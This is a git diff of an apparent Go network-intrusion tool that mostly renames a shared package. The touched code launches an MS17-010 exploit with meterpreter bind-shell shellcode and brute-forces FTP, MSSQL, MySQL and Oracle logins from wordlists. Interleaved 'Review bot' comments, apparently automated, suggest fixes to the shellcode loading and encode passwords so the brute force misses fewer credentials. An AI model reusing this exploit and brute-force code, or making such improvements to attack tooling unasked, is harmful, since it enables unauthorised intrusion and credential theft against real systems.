diff --git a/common/Parse.go b/Common/Parse.go similarity index 99% rename from common/Parse.go rename to Common/Parse.go index 6151691..127e19a 100644 --- a/common/Parse.go +++ b/Common/Parse.go @@ -1,4 +1,4 @@ -package common +package Common import ( "bufio" diff --git a/common/ParseIP.go b/Common/ParseIP.go similarity index 99% rename from common/ParseIP.go rename to Common/ParseIP.go index 66084be..316b319 100644 --- a/common/ParseIP.go +++ b/Common/ParseIP.go @@ -1,4 +1,4 @@ -package common +package Common import ( "bufio" diff --git a/common/ParsePort.go b/Common/ParsePort.go similarity index 98% rename from common/ParsePort.go rename to Common/ParsePort.go index 4ccac9e..cec40e8 100644 --- a/common/ParsePort.go +++ b/Common/ParsePort.go @@ -1,4 +1,4 @@ -package common +package Common import ( "strconv" diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go index 2297d1b..c07331c 100644 --- a/Plugins/CVE-2020-0796.go +++ b/Plugins/CVE-2020-0796.go @@ -6,7 +6,7 @@ import ( "github.com/shadow1ng/fscan/Config" "time" - "github.com/shadow1ng/fscan/common" + "github.com/shadow1ng/fscan/Common" ) const ( @@ -96,7 +96,7 @@ const ( ) func SmbGhost(info *Config.HostInfo) error { - if common.IsBrute { + if Common.IsBrute { return nil } err := SmbGhostScan(info) @@ -104,9 +104,9 @@ func SmbGhost(info *Config.HostInfo) error { } func SmbGhostScan(info *Config.HostInfo) error { - ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second + ip, port, timeout := info.Host, 445, time.Duration(Common.Timeout)*time.Second addr := fmt.Sprintf("%s:%v", info.Host, port) - conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout) + conn, err := Common.WrapperTcpWithTimeout("tcp", addr, timeout) if err != nil { return err } 
@@ -123,7 +123,7 @@ func SmbGhostScan(info *Config.HostInfo) error { } if bytes.Contains(buff[:n], []byte("Public")) == true && len(buff[:n]) >= 76 && bytes.Equal(buff[72:74], []byte{0x11, 0x03}) && bytes.Equal(buff[74:76], []byte{0x02, 0x00}) { result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip) - common.LogSuccess(result) + Common.LogSuccess(result) } return err } diff --git a/Plugins/ftp.go b/Plugins/FTP.go similarity index 77% rename from Plugins/ftp.go rename to Plugins/FTP.go index 19d925c..b973458 100644 --- a/Plugins/ftp.go +++ b/Plugins/FTP.go @@ -3,14 +3,14 @@ package Plugins import ( "fmt" "github.com/jlaffaye/ftp" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func FtpScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } starttime := time.Now().Unix() 
@@ -19,27 +19,27 @@ func FtpScan(info *Config.HostInfo) (tmperr error) { return err } else { errlog := fmt.Sprintf("[-] ftp %v:%v %v %v", info.Host, info.Ports, "anonymous", err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } } - for _, user := range common.Userdict["ftp"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["ftp"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) flag, err := FtpConn(info, user, pass) if flag && err == nil { return err } else { errlog := fmt.Sprintf("[-] ftp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["ftp"])*len(Common.Passwords)) * Common.Timeout) { return err } } @@ -51,7 +51,7 @@ func FtpScan(info *Config.HostInfo) (tmperr error) { func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second) + conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(Common.Timeout)*time.Second) if err == nil { err = conn.Login(Username, Password) if err == nil { @@ -73,7 +73,7 @@ func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err er } } } - common.LogSuccess(result) + Common.LogSuccess(result) } } return flag, err diff --git a/Plugins/findnet.go b/Plugins/FindNet.go similarity index 91% rename from Plugins/findnet.go rename to Plugins/FindNet.go index 2a8355c..13da7b3 100644 --- a/Plugins/findnet.go 
+++ b/Plugins/FindNet.go @@ -4,8 +4,8 @@ import ( "bytes" "encoding/hex" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strconv" "strings" "time" @@ -24,12 +24,12 @@ func Findnet(info *Config.HostInfo) error { func FindnetScan(info *Config.HostInfo) error { realhost := fmt.Sprintf("%s:%v", info.Host, 135) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return err } defer conn.Close() - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return err } @@ -119,6 +119,6 @@ func read(text []byte, host string) error { } result += "\n [->]" + string(host) } - common.LogSuccess(result) + Common.LogSuccess(result) return nil } diff --git a/Plugins/icmp.go b/Plugins/ICMP.go similarity index 95% rename from Plugins/icmp.go rename to Plugins/ICMP.go index 36acc14..240228b 100644 --- a/Plugins/icmp.go +++ b/Plugins/ICMP.go @@ -3,7 +3,7 @@ package Plugins import ( "bytes" "fmt" - "github.com/shadow1ng/fscan/common" + "github.com/shadow1ng/fscan/Common" "golang.org/x/net/icmp" "net" "os/exec" @@ -25,7 +25,7 @@ func CheckLive(hostslist []string, Ping bool) []string { for ip := range chanHosts { if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) { ExistHosts[ip] = struct{}{} - if common.Silent == false { + if Common.Silent == false { if Ping == false { fmt.Printf("(icmp) Target %-15s is alive\n", ip) } else { 
@@ -47,7 +47,7 @@ func CheckLive(hostslist []string, Ping bool) []string { if err == nil { RunIcmp1(hostslist, conn, chanHosts) } else { - common.LogError(err) + Common.LogError(err) //尝试无监听icmp探测 fmt.Println("trying RunIcmp2") conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second) @@ -59,7 +59,7 @@ func CheckLive(hostslist []string, Ping bool) []string { if err == nil { RunIcmp2(hostslist, chanHosts) } else { - common.LogError(err) + Common.LogError(err) //使用ping探测 fmt.Println("The current user permissions unable to send icmp packets") fmt.Println("start ping") @@ -72,17 +72,17 @@ func CheckLive(hostslist []string, Ping bool) []string { close(chanHosts) if len(hostslist) > 1000 { - arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true) + arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, true) for i := 0; i < len(arrTop); i++ { output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i]) - common.LogSuccess(output) + Common.LogSuccess(output) } } if len(hostslist) > 256 { - arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false) + arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, false) for i := 0; i < len(arrTop); i++ { output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i]) - common.LogSuccess(output) + Common.LogSuccess(output) } } diff --git a/Plugins/localinfo.go b/Plugins/LocalInfo.go similarity index 97% rename from Plugins/localinfo.go rename to Plugins/LocalInfo.go index 72835f7..eafb305 100644 --- a/Plugins/localinfo.go +++ b/Plugins/LocalInfo.go @@ -2,8 +2,8 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "os" "path/filepath" "runtime" 
@@ -93,7 +93,7 @@ func LocalInfoScan(info *Config.HostInfo) (err error) { home, err := os.UserHomeDir() if err != nil { errlog := fmt.Sprintf("[-] Get UserHomeDir error: %v", err) - common.LogError(errlog) + Common.LogError(errlog) return err } @@ -148,7 +148,7 @@ func scanFixedLocations(home string) { func checkAndLogFile(path string) { if _, err := os.Stat(path); err == nil { result := fmt.Sprintf("[+] Found sensitive file: %s", path) - common.LogSuccess(result) + Common.LogSuccess(result) } } @@ -202,7 +202,7 @@ func searchSensitiveFiles() { fileName := strings.ToLower(info.Name()) if strings.Contains(fileName, white) { result := fmt.Sprintf("[+] Found potential sensitive file: %s", path) - common.LogSuccess(result) + Common.LogSuccess(result) break } } diff --git a/Plugins/ms17010-exp.go b/Plugins/MS17010-Exp.go similarity index 98% rename from Plugins/ms17010-exp.go rename to Plugins/MS17010-Exp.go index dbcdd7b..8b78405 100644 --- a/Plugins/ms17010-exp.go +++ b/Plugins/MS17010-Exp.go @@ -5,8 +5,8 @@ import ( "encoding/binary" "encoding/hex" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "io" "io/ioutil" "net" @@ -17,7 +17,7 @@ import ( func MS17010EXP(info *Config.HostInfo) { address := info.Host + ":445" var sc string - switch common.SC { + switch Common.SC { case "bind": //msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex sc_enc := "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" 
@@ -34,16 +34,16 @@ func MS17010EXP(info *Config.HostInfo) { sc_enc := "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" sc = AesDecrypt(sc_enc, key) default: - if strings.Contains(common.SC, "file:") { - read, err := ioutil.ReadFile(common.SC[5:]) + if strings.Contains(Common.SC, "file:") { + read, err := ioutil.ReadFile(Common.SC[5:]) if err != nil { - errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", common.SC, err) - common.LogError(errlog) + errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", Common.SC, err) + Common.LogError(errlog) return } sc = fmt.Sprintf("%x", read) } else { - sc = common.SC + sc = Common.SC } } @@ -54,15 +54,15 @@ func MS17010EXP(info *Config.HostInfo) { sc1, err := hex.DecodeString(sc) if err != nil { - common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error()) + Common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error()) return } err = eternalBlue(address, 12, 12, sc1) if err != nil { - common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error()) + Common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error()) return } - common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end") + Common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end") } func eternalBlue(address string, initialGrooms, maxAttempts int, sc []byte) error { diff --git a/Plugins/ms17010.go b/Plugins/MS17010.go similarity index 94% rename from Plugins/ms17010.go rename to Plugins/MS17010.go index 0f30ead..500b6e1 100644 --- a/Plugins/ms17010.go +++ b/Plugins/MS17010.go @@ -5,8 +5,8 @@ import ( "encoding/hex" "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) 
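Review bot: In the `default` branch, `strings.Contains(Common.SC, "file:")` paired with `Common.SC[5:]` only does the right thing when `file:` is the first five characters of the value; a path such as `/tmp/file:sc.bin` passes the check and then has its first five bytes stripped, so the shellcode is read from a path the operator did not intend (and the error message prints the original value, hiding the mismatch). Use a prefix test and strip exactly that prefix: `if strings.HasPrefix(Common.SC, "file:") {` / `read, err := ioutil.ReadFile(strings.TrimPrefix(Common.SC, "file:"))`. As a style point, `ioutil.ReadFile` is deprecated in favour of `os.ReadFile`, which would also let the `io/ioutil` import go if nothing else uses it. `MS17010EXP` continues past this hunk.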
@@ -25,13 +25,13 @@ var ( ) func MS17010(info *Config.HostInfo) error { - if common.IsBrute { + if Common.IsBrute { return nil } err := MS17010Scan(info) if err != nil { errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err) - common.LogError(errlog) + Common.LogError(errlog) } return err } @@ -39,13 +39,13 @@ func MS17010(info *Config.HostInfo) error { func MS17010Scan(info *Config.HostInfo) error { ip := info.Host // connecting to a host in LAN if reachable should be very quick - conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(Common.Timeout)*time.Second) if err != nil { //fmt.Printf("failed to connect to %s\n", ip) return err } defer conn.Close() - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { //fmt.Printf("failed to connect to %s\n", ip) return err @@ -132,9 +132,9 @@ func MS17010Scan(info *Config.HostInfo) error { //if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os) //} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)} result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os) - common.LogSuccess(result) + Common.LogSuccess(result) defer func() { - if common.SC != "" { + if Common.SC != "" { MS17010EXP(info) } }() @@ -154,12 +154,12 @@ func MS17010Scan(info *Config.HostInfo) error { if reply[34] == 0x51 { result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip) - common.LogSuccess(result) + Common.LogSuccess(result) } } else { result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os) - common.LogSuccess(result) + Common.LogSuccess(result) } return err diff --git a/Plugins/mssql.go b/Plugins/MSSQL.go similarity index 68% rename from Plugins/mssql.go rename to Plugins/MSSQL.go index 2048709..f12e87a 100644 --- a/Plugins/mssql.go +++ b/Plugins/MSSQL.go 
@@ -4,31 +4,31 @@ import ( "database/sql" "fmt" _ "github.com/denisenkom/go-mssqldb" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func MssqlScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } starttime := time.Now().Unix() - for _, user := range common.Userdict["mssql"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["mssql"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) flag, err := MssqlConn(info, user, pass) if flag == true && err == nil { return err } else { errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mssql"])*len(Common.Passwords)) * Common.Timeout) { return err } } 
@@ -40,17 +40,17 @@ func MssqlScan(info *Config.HostInfo) (tmperr error) { func MssqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second) + dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(Common.Timeout)*time.Second) db, err := sql.Open("mssql", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() if err == nil { result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password) - common.LogSuccess(result) + Common.LogSuccess(result) flag = true } } diff --git a/Plugins/memcached.go b/Plugins/Memcached.go similarity index 75% rename from Plugins/memcached.go rename to Plugins/Memcached.go index 0ad4e7d..cade9ba 100644 --- a/Plugins/memcached.go +++ b/Plugins/Memcached.go 
@@ -2,22 +2,22 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func MemcachedScan(info *Config.HostInfo) (err error) { realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + client, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) defer func() { if client != nil { client.Close() } }() if err == nil { - err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = client.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err == nil { _, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten if err == nil { @@ -26,11 +26,11 @@ func MemcachedScan(info *Config.HostInfo) (err error) { if err == nil { if strings.Contains(string(rev[:n]), "STAT") { result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost) - common.LogSuccess(result) + Common.LogSuccess(result) } } else { errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err) - common.LogError(errlog) + Common.LogError(errlog) } } } diff --git a/Plugins/mongodb.go b/Plugins/Mongodb.go similarity index 90% rename from Plugins/mongodb.go rename to Plugins/Mongodb.go index 36805c2..82a6af2 100644 --- a/Plugins/mongodb.go +++ b/Plugins/Mongodb.go @@ -2,20 +2,20 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func MongodbScan(info *Config.HostInfo) error { - if common.IsBrute { + if Common.IsBrute { return nil } _, err := MongodbUnauth(info) if err != nil { errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err) - common.LogError(errlog) + Common.LogError(errlog) } return err } 
@@ -49,12 +49,12 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) { realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) checkUnAuth := func(address string, packet []byte) (string, error) { - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return "", err } defer conn.Close() - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return "", err } @@ -81,7 +81,7 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) { if strings.Contains(reply, "totalLinesWritten") { flag = true result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost) - common.LogSuccess(result) + Common.LogSuccess(result) } return flag, err } diff --git a/Plugins/mysql.go b/Plugins/MySQL.go similarity index 67% rename from Plugins/mysql.go rename to Plugins/MySQL.go index 23e578f..8a193d4 100644 --- a/Plugins/mysql.go +++ b/Plugins/MySQL.go 
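Review bot: The `checkUnAuth` closure declares an `address` parameter but dials `realhost` captured from the enclosing scope, so the parameter is dead and any call that passes a different address silently probes `realhost` instead. Either dial the parameter, `conn, err := Common.WrapperTcpWithTimeout("tcp", address, time.Duration(Common.Timeout)*time.Second)`, or drop it from the signature; the callers are outside this hunk, so which of the two is intended should be confirmed before changing it. Only a read deadline is set on the connection here; if the closure writes the packet before reading (the `packet` parameter suggests so), a write deadline or `SetDeadline` would bound that side as well. Both the closure body and `MongodbUnauth` continue beyond the hunk.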
@@ -4,31 +4,31 @@ import ( "database/sql" "fmt" _ "github.com/go-sql-driver/mysql" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func MysqlScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } starttime := time.Now().Unix() - for _, user := range common.Userdict["mysql"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["mysql"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) flag, err := MysqlConn(info, user, pass) if flag == true && err == nil { return err } else { errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mysql"])*len(Common.Passwords)) * Common.Timeout) { return err } } 
@@ -40,17 +40,17 @@ func MysqlScan(info *Config.HostInfo) (tmperr error) { func MysqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second) + dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(Common.Timeout)*time.Second) db, err := sql.Open("mysql", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() if err == nil { result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password) - common.LogSuccess(result) + Common.LogSuccess(result) flag = true } } diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go index b025f5c..e2fa349 100644 --- a/Plugins/NetBIOS.go +++ b/Plugins/NetBIOS.go @@ -4,8 +4,8 @@ import ( "bytes" "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "gopkg.in/yaml.v3" "net" "strconv" @@ -20,7 +20,7 @@ func NetBIOS(info *Config.HostInfo) error { output := netbios.String() if len(output) > 0 { result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output) - common.LogSuccess(result) + Common.LogSuccess(result) return nil } return errNetBIOS 
@@ -41,12 +41,12 @@ func NetBIOS1(info *Config.HostInfo) (netbios NetBiosInfo, err error) { } realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) var conn net.Conn - conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err = Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return } defer conn.Close() - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return } @@ -89,12 +89,12 @@ func GetNbnsname(info *Config.HostInfo) (netbios NetBiosInfo, err error) { senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1} //senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01") realhost := fmt.Sprintf("%s:137", info.Host) - conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := net.DialTimeout("udp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return } defer conn.Close() - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return } diff --git a/Plugins/oracle.go b/Plugins/Oracle.go similarity index 69% rename from Plugins/oracle.go rename to Plugins/Oracle.go index 37f867c..e956f26 100644 --- a/Plugins/oracle.go +++ b/Plugins/Oracle.go 
@@ -3,32 +3,32 @@ package Plugins import ( "database/sql" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" _ "github.com/sijms/go-ora/v2" "strings" "time" ) func OracleScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } starttime := time.Now().Unix() - for _, user := range common.Userdict["oracle"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["oracle"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) flag, err := OracleConn(info, user, pass) if flag == true && err == nil { return err } else { errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["oracle"])*len(Common.Passwords)) * Common.Timeout) { return err } } @@ -43,14 +43,14 @@ func OracleConn(info *Config.HostInfo, user string, pass string) (flag bool, err dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port) db, err := sql.Open("oracle", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() if err == nil { result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password) - common.LogSuccess(result) + Common.LogSuccess(result) flag = true } } 
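Review bot: `OracleConn` builds `dataSourceName` with `fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", ...)` and no escaping, so a wordlist entry containing `@`, `/`, `#`, `?` or `%` (common in password lists, and `{user}` substitution can introduce them) yields a URL that the driver parses as a different host or rejects outright; the loop then logs it as an ordinary failed login, a silent false negative for exactly the passwords most worth trying. Build the URL with `net/url` so user and password are percent-encoded: `u := url.URL{Scheme: "oracle", User: url.UserPassword(Username, Password), Host: Host + ":" + Port, Path: "orcl"}` and `db, err := sql.Open("oracle", u.String())` (needs `net/url` in the import block). The service name `orcl` is also hard-coded on that line; a target listening under another service name will reject every credential for the same reason, so making it configurable would remove a second source of false negatives, though I cannot see from this diff whether a config field exists for it. The import block is partly outside the hunk.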
diff --git a/Plugins/portscan.go b/Plugins/PortScan.go similarity index 87% rename from Plugins/portscan.go rename to Plugins/PortScan.go index c3b291e..c91c3a4 100644 --- a/Plugins/portscan.go +++ b/Plugins/PortScan.go @@ -2,7 +2,7 @@ package Plugins import ( "fmt" - "github.com/shadow1ng/fscan/common" + "github.com/shadow1ng/fscan/Common" "sort" "strconv" "sync" @@ -16,12 +16,12 @@ type Addr struct { func PortScan(hostslist []string, ports string, timeout int64) []string { var AliveAddress []string - probePorts := common.ParsePort(ports) + probePorts := Common.ParsePort(ports) if len(probePorts) == 0 { fmt.Printf("[-] parse port %s error, please check your port format\n", ports) return AliveAddress } - noPorts := common.ParsePort(common.NoPorts) + noPorts := Common.ParsePort(Common.NoPorts) if len(noPorts) > 0 { temp := map[int]struct{}{} for _, port := range probePorts { @@ -39,7 +39,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { probePorts = newDatas sort.Ints(probePorts) } - workers := common.Threads + workers := Common.Threads Addrs := make(chan Addr, 100) results := make(chan string, 100) var wg sync.WaitGroup 
@@ -77,20 +77,20 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { host, port := addr.ip, addr.port - conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) if err == nil { defer conn.Close() address := host + ":" + strconv.Itoa(port) result := fmt.Sprintf("%s open", address) - common.LogSuccess(result) + Common.LogSuccess(result) wg.Add(1) respondingHosts <- address } } func NoPortScan(hostslist []string, ports string) (AliveAddress []string) { - probePorts := common.ParsePort(ports) - noPorts := common.ParsePort(common.NoPorts) + probePorts := Common.ParsePort(ports) + noPorts := Common.ParsePort(Common.NoPorts) if len(noPorts) > 0 { temp := map[int]struct{}{} for _, port := range probePorts { diff --git a/Plugins/postgres.go b/Plugins/Postgres.go similarity index 72% rename from Plugins/postgres.go rename to Plugins/Postgres.go index 68681d1..c6e51e7 100644 --- a/Plugins/postgres.go +++ b/Plugins/Postgres.go 
